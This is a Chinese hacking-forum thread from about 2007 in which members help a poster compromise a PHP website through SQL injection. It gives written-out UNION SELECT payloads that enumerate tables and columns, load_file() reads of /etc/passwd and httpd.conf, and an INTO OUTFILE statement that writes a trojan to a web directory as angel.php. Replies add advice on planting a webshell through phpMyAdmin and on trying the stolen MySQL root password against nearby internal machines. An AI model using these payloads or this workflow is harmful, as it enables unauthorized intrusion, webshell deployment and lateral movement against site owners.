[讨论]郁闷的PHP注入.... PHP, 讨论

虚竹

[讨论]郁闷的PHP注入....
议题作者：寂寞hacker
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

  今天安检一个站的时候遇到了个郁闷的问题，他全站是html静态的，好不容易在一个偏僻的角落找到了个php注入点，偷笑中....还没笑完呢，郁闷的事情来了，首先猜测字段，偶猜到48了才正常，吓得我以为没戏了，可以直接loadfile /etc/passwd 这个文件，但是郁闷的事情发生了。

情况如下图：

   未命名.jpg (12 KB)

2007-10-29 17:35

原因是网页限制了信息的长度，三个能显示的地方都试过了，基本上只能把pass这个文件的头信息显示出来，后台找不到，数据库字段也猜不到，网站是他们自己写的！WEB环境：
Apache/2.0.59 (Unix) PHP/4.4.4  系统是FreeBSD，对红旗系统不熟。。。接下来。哪位高手指教下。成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。


帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

jackal
晶莹剔透§烈日灼然

滚死草

呵呵...不要急...很简单的...先把思路整理好...比如你前面解决那些问题的方法和思考过程都可以写一写。。方便大家帮你。。。也许在整理的过程中你会豁然开朗..
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

FI~鱼~SH

借地方发个和PHP有关的问题：
http://www.***.com/view.php?id=650 存在注入点，手工检测有74个字段，所以没办法用工具查表
用and/**/1=2/**/union/**/select/**/1,TABLE_NAME,3,。。。。。,73,74/**/FROM/**/INFORMATION_SCHEMA.TABLES--
暴出所有表并找到admins表，但是问题来了，常用列都猜了，但是猜不到，想用
/**/and/**/1=2/**/union/**/select/**/1,COLUMN_NAME,3,4。。。。。,73,74/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME='admins'--
把admins表中的列暴出来，死活都暴不了，不知道是语句错了还是其他的原因，请大家帮忙看看
帖子22 精华0 积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21 查看详细资料引用 报告 回复 TOP

heiye88
晶莹剔透§烈日灼然

→有几坏←

还有一种尝试：找找看有没有PHPMYADMIN的目录，用root登录进去，插表导出shell就舒服多了。当然前提还是得有个目标777的目录
帖子145 精华2 积分574 阅读权限50 性别男 来自china 在线时间106 小时 注册时间2005-9-27 最后登录2008-7-9 查看个人网站
查看详细资料引用 报告 回复 TOP

akens
晶莹剔透§烈日灼然

btjily

我就是想问


/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,ts04,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/**/from/**/gsj.tousu_anjian/**/where/**/ts01=5201314159/**/into/**/outfile/**/'/usr/httpd/lonely/service/angel.php'/*

这个导出语句对了木。。。。。不对的话麻烦哪位大虾，说下改哪个？成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

唐不狐
很黃很暴力

晶莹剔透§烈日灼然

1600cc

substring和load_file()连用。想导出必须找到可写目录。
帖子3 精华0 积分13 阅读权限40 性别男 在线时间0 小时 注册时间2007-5-1 最后登录2008-6-18 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

逍遥公子

还有，他们的web程序一看就是自己写的，很烂的那种！成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

ggdd
晶莹剔透§烈日灼然

gmcc-lxx

Web目录自己研究出来了,看了下大虾们的php导出shell的文章，最后得到如下的东东！因为我能写东西的地方在另外一个库，所以这里我跨库查询了，ts04是我的小马内容， 没过滤！我不要*/into/**/outfile/**/'/usr/httpd/lonely/service/angel.php'/* 这一段能执行查询的！而且查看页面源代码，我的小马原样在，可是加上这个就查询出错了，貌似是我这个导出没写对！大虾们指教！

/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,ts04,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/**/from/**/gsj.tousu_anjian/**/where/**/ts01=5201314159/**/into/**/outfile/**/'/usr/httpd/lonely/service/angel.php'/*成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

d501

BSD root不好拿，他说的应该是MySQL root

WEB绑定有域名，你管他能不能些，解不解析，只要在这些目录下面找个777 ，写入Shell就可以了。是在找不到就当份程序下来，自己查找一下有什么可以利用的地方，所有的WEB目录都有价值，也许有些域名没有解析过来。

172.28.1.70这个是你修改过的，还是他们自己的，如果是自己有的那可能他们上面还有其他服务器在附近，用SQL密码连一下附近的机器测试一下幸福，那就是……我饿了，看别人手里拿个肉包子，那他就比我幸福；我冷了，看别人穿了一件厚棉袄，他就比我幸福；我想上茅房，就一个坑，你蹲那了，你就比我幸福。
帖子644 精华22 积分5000 阅读权限255 在线时间1758 小时 注册时间2005-1-7 最后登录2008-7-20 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

wds

freebsd 默认是禁止root远程登录
而且su成root要求必须是wheel组的用户
帖子24 精华0 积分79 阅读权限40 在线时间60 小时 注册时间2004-12-31 最后登录2008-7-1 查看详细资料引用 报告 回复 TOP

Helvin
团队决策人

胖嘟嘟

汗！最新进度，搞到root帐号密码，3306也开了。。。但是，默认禁止ROOT远程连接！靠！哪位有PHP导出SHELL的资料，给份。谢谢！成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

cnhawk
晶莹剔透§烈日灼然

dabofeng

哦也。。。。拿到了。。不过！看不懂ing.....找了几个目录都不对。。求救！

省略废话一大堆后：如下！

module-specific configurations # Include conf/ssl.conf ### Section 3: Virtual Hosts # # VirtualHost: If you want

to maintain multiple domains/hostnames on your # machine you can setup VirtualHost containers for them. Most

configurations # use only name-based virtual hosts so the server doesn't need to worry about # IP addresses.

This is indicated by the asterisks in the directives below. # # Please see the documentation at # # for further

details before you try to setup virtual hosts. # # You may use the command line option '-S' to verify your

virtual host # configuration. # # Use name-based virtual hosting. # #NameVirtualHost *:80 NameVirtualHost

172.28.1.70 ServerName localhost ServerAdmin info@lonely.cn DocumentRoot /usr/httpd ServerAdmin info@lonely.cn

DocumentRoot /usr/httpd/lonely ServerName www.lonely.cn ServerAlias lonely.cn www.lonely.cn lonely.cn lonely.org

ServerAdmin info@lonely.cn DocumentRoot /usr/httpd/lpsgsj ServerName lps.lonely.cn ServerAlias lps.lonely.cn

ServerAdmin info@lonely.cn DocumentRoot /usr/httpd/meitangsj ServerName meitan.lonely.cn ServerAlias

meitan.lonely.cn DirectoryIndex Default.htm index.html ServerAdmin info@lonely.cn DocumentRoot /usr/httpd/js

ServerName js.lonely.cn DirectoryIndex Default.htm index.html ServerAdmin info@lonely.cn DocumentRoot

/usr/httpd/go ServerName go.lonely.cn # # ServerAdmin info@lonely.cn # DocumentRoot /usr/httpd/test # ServerName

test.lonely.cn # # # VirtualHost example: # Almost any Apache directive may go into a VirtualHost container. #

The first VirtualHost section is used for requests without a known # server name. # # # ServerAdmin

webmaster@dummy-host.example.com # DocumentRoot /www/docs/dummy-host.example.com # ServerName dummy-

host.example.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-

access_log common #

帮忙看看。。。谢谢！Web路径，我试了几个都不对！成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

jack

上面的路径load 没东西！成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

sxltxyh

/usr/local/apache2/conf/httpd.conf

这个能读出东东！不过。。。
555555555555

住所： # # Based upon the NCSA server configuration files originally by Rob M

还是受这个框的限制。。。。。。我再想想办法!成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

凯宁

引用:
引用第9楼ring04h于2007-10-30 00:42发表的 :


load httpd.conf httpd.conf 国内全是 755 权限. 能读.
/usr/local/httpd/conf/httpd.conf

默认路径？成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

白兔仔

引用:
引用第7楼hackest于2007-10-29 23:39发表的 :
有root的话可以into outfile()导出一句话的
php outfile 需要 ' 单引号或者双引号,  无法outfile!
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

ring04h
团队执行官

东莞维维

引用:
引用第6楼寂寞宝贝于2007-10-29 20:56发表的 :
FreeBSD下面。。。如何得到当前的WEB路径？因为他关闭了错误回显！得不到文件路径！
load httpd.conf httpd.conf 国内全是 755 权限. 能读.
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

车来车去

FreeBSD下面。。。如何得到当前的WEB路径？因为他关闭了错误回显！得不到文件路径！成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

hackest
运维管理组

marco

有root的话可以into outfile()导出一句话的My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料引用 报告 回复 TOP

ring04h
团队执行官

高步轩仔

引用:
引用第2楼Helvin于2007-10-29 18:55发表的 :
FreeBSD跟红旗什么关系?
/etc/passwd 文件中没有密码。ports编译的MySQL没有root权限拿不到/etc/master.passwd，就算拿到也基本没用，master.passwd中的密码是MD5的。

输出个webshell看看root下面有什么，有没有记录密码什么的，看一下有没有装有能提权的软件，BSD的内核级漏洞很少，可以从应用程序软件上入手。系统应该是FB6.1吧
汗！说错了！FreeBSD跟红旗没关系，关于PASS被加密，这条路不走了！至于Helvin大哥说的输出webshell是什么意思？建个表导出么？给点资料！很久没碰这个了！呵呵！谢谢！成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 良辰择日，预测咨询，公司改名，权威易经

寂寞宝贝
荣誉会员